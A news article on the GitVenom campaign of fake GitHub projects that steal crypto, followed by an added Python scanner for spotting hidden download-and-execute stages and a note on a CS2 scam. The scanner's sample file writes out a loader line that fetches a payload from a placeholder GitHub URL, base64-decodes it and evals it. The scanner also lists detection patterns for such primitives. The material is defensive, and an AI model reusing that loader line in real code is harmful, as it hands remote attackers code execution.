GitVenom Malware Targets Bitcoin Users, Steals $456K by Hijacking Wallets through Fake GitHub Projects


Security researchers are drawing attention to an ongoing campaign that targets gamers and cryptocurrency investors. The scheme poses as open-source projects hosted on GitHub. Tracked as GitVenom by Kaspersky, the campaign spans hundreds of repositories containing fake projects.
The fake projects advertise functionality such as an automation tool for interacting with Instagram accounts, a Telegram bot for remotely managing Bitcoin wallets, and a cracked tool for playing Valorant. None of this functionality is genuine: the operators' aim is to steal personal data and banking information and to hijack cryptocurrency wallet addresses.
The criminals running this operation have stolen five bitcoins, worth approximately $456,600 at the current value. The campaign has been active for about two years, with some of the fake projects published that long ago. Most of the fraudulent activity has been recorded in Russia, Brazil, and Turkey.
The malicious projects are written in a variety of programming languages, including Python, JavaScript, C, C++, and C#. Regardless of the language, the objective is the same: trigger a hidden malicious component embedded in the project, which then retrieves and executes additional attacker-controlled components from a GitHub repository.
The key components delivered through these bogus projects include a Node.js information stealer that collects passwords, bank account details, saved login credentials, cryptocurrency wallet data, and browsing history; the data is packed into a .7z archive and sent to the threat actors via Telegram. The projects also distribute remote administration tools such as AsyncRAT and Quasar RAT, which give the attackers control of infected devices, and a clipper that replaces copied wallet addresses with attacker-controlled addresses to redirect the funds.
In light of these findings, Kaspersky researcher Georgy Kucherin emphasizes the importance of exercising caution when dealing with third-party code. He warns that threat actors will keep using fake software to infect systems. Developers are urged to review code thoroughly before running or integrating it, to avoid unexpected malicious activity.
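As an added illustration (not code from the Kaspersky report or from this article), the hidden stage described above is in effect a small loader: it fetches further components from a GitHub repository and executes them. A developer who wants to check a cloned repository before running it can triage the tree for that combination of a remote fetch, a dynamic-execution or process-spawning primitive, and a GitHub URL in the same file. The heuristics, the file extensions and the two sample files below are my own constructed assumptions, and the organisation and repository names in the sample URL are placeholders; a flagged file still has to be read by a person.

```python
"""Triage a cloned repository for a hidden download-and-execute stage before running it.

Added example, not Kaspersky's or the article's code. The heuristics are assumptions:
a file that combines a remote-fetch call, a dynamic-execution or process-spawning
primitive, and a GitHub URL has the shape of the loader the article describes."""
import re
from pathlib import Path
from typing import Dict, List

# Remote-fetch primitives for the languages the article names (Python, JS, C#, C/C++).
FETCH_PATTERNS = [
    r"\brequests\.get\s*\(",
    r"\burllib\.request\.urlopen\s*\(",
    r"\bfetch\s*\(",
    r"\baxios\.get\s*\(",
    r"\bhttps?\.get\s*\(",
    r"\bnew\s+(?:WebClient|HttpClient)\s*\(",
    r"\bcurl_easy_perform\s*\(",
]
# Dynamic execution and process-spawning primitives.
EXEC_PATTERNS = [
    r"\b(?:exec|eval)\s*\(",
    r"\bnew\s+Function\s*\(",
    r"\bchild_process\b",
    r"\bsubprocess\.(?:Popen|run|call)\s*\(",
    r"\bos\.system\s*\(",
    r"\bProcess\.Start\s*\(",
    r"\b(?:system|WinExec|ShellExecuteW?|CreateProcessW?)\s*\(",
]
# Payload decoding that often sits between the fetch and the execution step.
DECODE_PATTERNS = [
    r"\bb64decode\s*\(",
    r"\batob\s*\(",
    r"Buffer\.from\s*\([^)]*['\"]base64['\"]",
    r"\bFromBase64String\s*\(",
]
GITHUB_URL = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|github\.com|objects\.githubusercontent\.com)/[^\s'\"<>]+"
)

def _find_all(patterns: List[str], text: str) -> List[str]:
    return [m.group(0) for p in patterns for m in re.finditer(p, text)]

def scan_source(text: str) -> Dict[str, object]:
    """Classify one source file by which indicator groups it contains."""
    hits = {
        "fetch": _find_all(FETCH_PATTERNS, text),
        "exec": _find_all(EXEC_PATTERNS, text),
        "decode": _find_all(DECODE_PATTERNS, text),
        "github_url": GITHUB_URL.findall(text),
    }
    if hits["exec"] and hits["fetch"] and hits["github_url"]:
        verdict = "high"    # fetches from GitHub and executes: the loader shape
    elif hits["exec"] and (hits["fetch"] or hits["decode"]):
        verdict = "medium"  # executes remote or decoded content of unknown origin
    elif hits["exec"]:
        verdict = "review"  # spawns processes or evals; read it before running
    else:
        verdict = "clean"
    return {"verdict": verdict, **hits}

SOURCE_EXTS = {".py", ".js", ".ts", ".c", ".cpp", ".cs"}

def scan_tree(root: Path) -> Dict[str, Dict[str, object]]:
    """Scan every source file under root; keys are paths relative to root."""
    results = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in SOURCE_EXTS:
            text = path.read_text(encoding="utf-8", errors="replace")
            results[path.relative_to(root).as_posix()] = scan_source(text)
    return results

def scan_sources(files: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Same triage over an in-memory {path: source} mapping (used for the samples)."""
    return {name: scan_source(text) for name, text in files.items()}

# Constructed sample files; the org/repo in the URL is a placeholder, not a real project.
SAMPLE_FILES = {
    "bot.py": (
        "import requests\n"
        "def get_updates(token):\n"
        "    r = requests.get(f'https://api.telegram.org/bot{token}/getUpdates')\n"
        "    return r.json()\n"
    ),
    "utils/helpers.js": (
        "const { exec } = require('child_process');\n"
        "fetch('https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage2.js')\n"
        "  .then(r => r.text())\n"
        "  .then(b => eval(Buffer.from(b, 'base64').toString()));\n"
    ),
}

if __name__ == "__main__":
    for name, result in scan_sources(SAMPLE_FILES).items():
        print(f"{name}: {result['verdict']}  exec={result['exec']} url={result['github_url']}")
```

Run `scan_tree(Path("path/to/clone"))` on a freshly cloned repository and read every file that comes back as `high` or `medium` before executing anything from it. The verdict is deliberately coarse: a legitimate updater can also fetch from GitHub and run what it downloads, so the scan narrows what to read rather than deciding on its own.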
Separately, Bitdefender reports a scam targeting Counter-Strike 2 (CS2) players during major e-sports events such as IEM Katowice 2025 and PGL Cluj-Napoca 2025. Cybercriminals exploit YouTube accounts to impersonate professional players and lure fans with fake CS2 skin giveaways, ultimately stealing Steam accounts, cryptocurrency, and valuable in-game items.